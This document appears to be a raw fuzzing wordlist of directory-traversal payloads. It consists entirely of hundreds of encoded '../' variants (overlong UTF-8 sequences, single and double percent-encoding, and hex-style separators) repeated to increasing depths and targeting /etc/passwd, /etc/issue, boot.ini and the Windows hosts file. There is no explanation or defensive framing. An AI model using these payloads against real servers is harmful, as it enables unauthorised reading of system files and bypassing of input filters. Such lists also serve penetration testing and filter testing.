-%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afissue -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afboot.ini -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afissue -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afboot.ini -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afetc%f0%80%80%afissue -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afboot.ini -%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%af%c0%ee%c0%ee%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ee%c0%ee%f8%80%80%80%afboot.ini -%c0%ee%c0%ee%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afboot.ini -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afboot.ini -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afboot.ini -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afboot.ini -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afboot.ini -%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%af%c0%ee%c0%ee%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%fe%c0%fe/etc/passwd -%c0%fe%c0%fe/etc/issue -%c0%fe%c0%fe/boot.ini -%c0%fe%c0%fe/windows/system32/drivers/etc/hosts -%c0%fe%c0%fe/%c0%fe%c0%fe/etc/passwd -%c0%fe%c0%fe/%c0%fe%c0%fe/etc/issue -%c0%fe%c0%fe/%c0%fe%c0%fe/boot.ini -%c0%fe%c0%fe/%c0%fe%c0%fe/windows/system32/drivers/etc/hosts -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/passwd -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/issue -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/boot.ini -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/windows/system32/drivers/etc/hosts -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/passwd -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/issue -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/boot.ini -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/windows/system32/drivers/etc/hosts -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/passwd -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/issue -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/boot.ini -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/windows/system32/drivers/etc/hosts -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/passwd -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/etc/issue -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/boot.ini -%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/%c0%fe%c0%fe/windows/system32/drivers/etc/hosts -%c0%fe%c0%fe\etc\passwd -%c0%fe%c0%fe\etc\issue -%c0%fe%c0%fe\boot.ini -%c0%fe%c0%fe\windows\system32\drivers\etc\hosts -%c0%fe%c0%fe\%c0%fe%c0%fe\etc\passwd -%c0%fe%c0%fe\%c0%fe%c0%fe\etc\issue -%c0%fe%c0%fe\%c0%fe%c0%fe\boot.ini -%c0%fe%c0%fe\%c0%fe%c0%fe\windows\system32\drivers\etc\hosts -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\passwd -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\issue -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\boot.ini -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\windows\system32\drivers\etc\hosts -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\passwd -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\issue -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\boot.ini -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\windows\system32\drivers\etc\hosts -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\passwd -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\issue -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\boot.ini -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\windows\system32\drivers\etc\hosts -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\passwd -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\etc\issue -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\boot.ini -%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\%c0%fe%c0%fe\windows\system32\drivers\etc\hosts -%c0%fe%c0%fe%2fetc%2fpasswd -%c0%fe%c0%fe%2fetc%2fissue -%c0%fe%c0%fe%2fboot.ini -%c0%fe%c0%fe%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fpasswd -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fissue -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fboot.ini -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fpasswd -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fissue -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fboot.ini -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fpasswd -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fissue -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fboot.ini -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fpasswd -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fissue -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fboot.ini -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fpasswd -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fetc%2fissue -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fboot.ini -%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2f%c0%fe%c0%fe%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%fe%c0%fe%5cetc%5cpasswd -%c0%fe%c0%fe%5cetc%5cissue -%c0%fe%c0%fe%5cboot.ini -%c0%fe%c0%fe%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cpasswd -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cissue -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cboot.ini -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cpasswd -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cissue -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cboot.ini -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cpasswd -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cissue -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cboot.ini -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cpasswd -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cissue -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cboot.ini -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cpasswd -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cetc%5cissue -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cboot.ini -%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5c%c0%fe%c0%fe%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%fe%c0%fe0x2fetc0x2fpasswd -%c0%fe%c0%fe0x2fetc0x2fissue -%c0%fe%c0%fe0x2fboot.ini -%c0%fe%c0%fe0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fpasswd -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fissue -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fboot.ini -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fpasswd -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fissue -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fboot.ini -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fpasswd -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fissue -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fboot.ini -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fpasswd -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fissue -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fboot.ini -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fpasswd -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fetc0x2fissue -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fboot.ini -%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2f%c0%fe%c0%fe0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%fe%c0%fe0x5cetc0x5cpasswd -%c0%fe%c0%fe0x5cetc0x5cissue -%c0%fe%c0%fe0x5cboot.ini -%c0%fe%c0%fe0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cpasswd -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cissue -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cboot.ini -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cpasswd -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cissue -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cboot.ini -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cpasswd -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cissue -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cboot.ini -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cpasswd -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cissue -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cboot.ini -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cpasswd -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cetc0x5cissue -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cboot.ini -%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5c%c0%fe%c0%fe0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%fe%c0%fe%252fetc%252fpasswd -%c0%fe%c0%fe%252fetc%252fissue -%c0%fe%c0%fe%252fboot.ini -%c0%fe%c0%fe%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fpasswd -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fissue -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fboot.ini -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fpasswd -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fissue -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fboot.ini -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fpasswd -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fissue -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fboot.ini -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fpasswd -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fissue -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fboot.ini -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fpasswd -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fetc%252fissue -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fboot.ini -%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252f%c0%fe%c0%fe%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%fe%c0%fe%255cetc%255cpasswd -%c0%fe%c0%fe%255cetc%255cissue -%c0%fe%c0%fe%255cboot.ini -%c0%fe%c0%fe%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cpasswd -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cetc%255cissue -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cboot.ini -%c0%fe%c0%fe%255c%c0%fe%c0%fe%255cwindows%255csystem32%255cdrivers%255cetc%255chosts 